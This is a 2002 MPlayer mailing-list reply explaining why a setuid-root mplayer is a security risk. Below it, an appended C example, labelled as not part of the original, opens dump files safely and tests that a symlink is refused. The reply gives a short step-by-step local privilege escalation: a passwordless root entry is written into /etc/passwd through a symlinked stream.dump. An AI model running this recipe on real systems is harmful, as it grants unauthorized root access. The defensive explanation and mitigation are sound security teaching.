[MPlayer-users] Setuid root mplayer

D Richard Felker III dalias at aerifal.cx
Wed Aug 28 15:55:02 CEST 2002


On Wed, Aug 28, 2002 at 12:30:23PM +0200, Davide Decicco wrote:
> [Automatic answer: RTFM (read DOCS, FAQ), also read DOCS/bugreports.html]
> Is someone able to explain to me (or point me to some useful resource on the
> web) why setuid root mplayer is a security risk? How can one gain root
> privileges through it ?
> Thanks.

1) Make an mp3 file containing the string (\n = newline):

\nroot::0:0::/root:/bin/sh\n

2) Mux it into an avi with mencoder.

3) ln -s /etc/passwd stream.dump

4) mplayer -dumpstream your.avi

5) Login as root with no password.

Sound good? That's just a dumb simple approach that assumes blank
passwords are allowed on the system and the passwords are stored in
/etc/passwd. Of course there are much better ways too.

Rich
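
Added example, not part of the original post and not MPlayer's code: the write in steps 3 and 4 lands in the wrong file because a privileged process follows a user-controlled symlink when creating its dump file. One defensive pattern in C is to drop privileges and refuse symlinks and pre-existing names; `open_dump_safely` and `demo_symlink_refused` are hypothetical names, and the self-check runs in a constructed temporary directory.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: open `path` for writing as the invoking user,
 * refusing symlinks and pre-existing files. Returns an fd, or -1 with errno set. */
int open_dump_safely(const char *path)
{
    /* Permanently drop any setuid/setgid privilege before touching user paths. */
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    /* O_EXCL: fail if the name already exists, including a (dangling) symlink.
     * O_NOFOLLOW: never follow a symlink in the final path component. */
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed self-check: returns 1 if a symlinked stream.dump is refused,
 * its target is left untouched, and a fresh name is still accepted. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/dumpdemoXXXXXX";
    char target[64], lnk[64], fresh[64];
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/target", dir);   /* stand-in for a sensitive file */
    snprintf(lnk, sizeof lnk, "%s/stream.dump", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh.dump", dir);

    int t = open(target, O_WRONLY | O_CREAT, 0600);
    if (t < 0 || symlink(target, lnk) != 0) return 0;
    close(t);

    int fd = open_dump_safely(lnk);
    int refused = (fd == -1 && (errno == EEXIST || errno == ELOOP));
    int untouched = (stat(target, &st) == 0 && st.st_size == 0);
    int ok = open_dump_safely(fresh);
    int accepted = (ok >= 0);
    if (ok >= 0) close(ok);
    unlink(lnk); unlink(target); unlink(fresh); rmdir(dir);
    return refused && untouched && accepted;
}

int main(void) { puts(demo_symlink_refused() ? "symlink refused" : "check failed"); return 0; }
```

The simpler mitigation remains not installing the binary setuid root at all; the helper only covers the dump-file path.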




